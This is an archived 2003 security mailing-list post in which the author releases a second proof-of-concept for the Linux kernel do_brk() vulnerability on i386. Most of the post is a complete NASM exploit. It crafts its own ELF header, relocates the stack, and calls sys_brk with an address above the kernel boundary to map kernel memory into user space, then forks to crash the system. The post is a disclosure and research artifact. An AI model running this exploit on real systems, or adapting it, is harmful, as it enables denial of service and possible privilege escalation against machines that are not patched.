lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200312041655.35633.julien@cr0.org>
From: julien at cr0.org (Julien TINNES)
Subject: Linux kernel do_brk(), another proof-of-concept code for i386

There were complains that previous POC wasn't working on some kernels, and I 
even saw a guy on IRC asking about POC using a different method.

The previous version was relying on the Linux ELF loader to call do_brk for 
us. This one uses sys_brk(), but to bypass a check of available memory in 
sys_brk we still have to map our code high in memory (but not past 
PAGE_OFFSET this time).

To be able to call sys_brk with success we had to make sure the stack was'nt 
above our program (in most case we have to move it).

Then you can easily crash your system (do a fork(), clone(), execve()...), 
doing something else is'nt trivial :p

Use NASM 0.98.38 or higher to compile.

Julien TINNES
-------------- next part --------------
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;


  BITS 32

                org     0xBFFF0000

  ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1            ;   e_ident
        times 9 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      2                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx

  ehdrsize      equ     $ - ehdr

  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      filesize                        ;   p_memsz
                dd      7                               ;   p_flags
                dd      0x1000                          ;   p_align

  phdrsize      equ     $ - phdr

  _start:

		; ** Make sure the stack is not above us

                mov     eax, 163         ; mremap
                mov     ebx, esp
		
		and	ebx, ~(0x1000 - 1)	; align to page size

		mov	ecx, 0x1000	; we suppose stack is one page only
                mov     edx, 0x9000	; be sure it can't get mapped after
					; us
                mov     esi,1		; MREMAP_MAYMOVE
                int     0x80


		and	esp, (0x1000 - 1)	; offset in page
		add	esp, eax		; stack ptr to new location
						; nb: we don't fix
						; pointers so environ/cmdline
						; are not available

  		mov	eax,152		; mlockall (for tests as root)
  		mov	ebx,2		; MCL_FUTURE
  		int	0x80

		; get VMAs for the kernel memory

                mov     eax,45          ; brk
                mov     ebx,0xC0500000
		int	0x80

		
		mov	ecx, 4
  loop0:
		
  		mov	eax, 2		; fork
  		int	0x80
		loop	loop0

  _idle:

                mov     eax,162         ; nanosleep
                mov     ebx,timespec
                int     0x80
                jmp     _idle

  timespec      dd      10,0

  filesize      equ     $ - $$

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ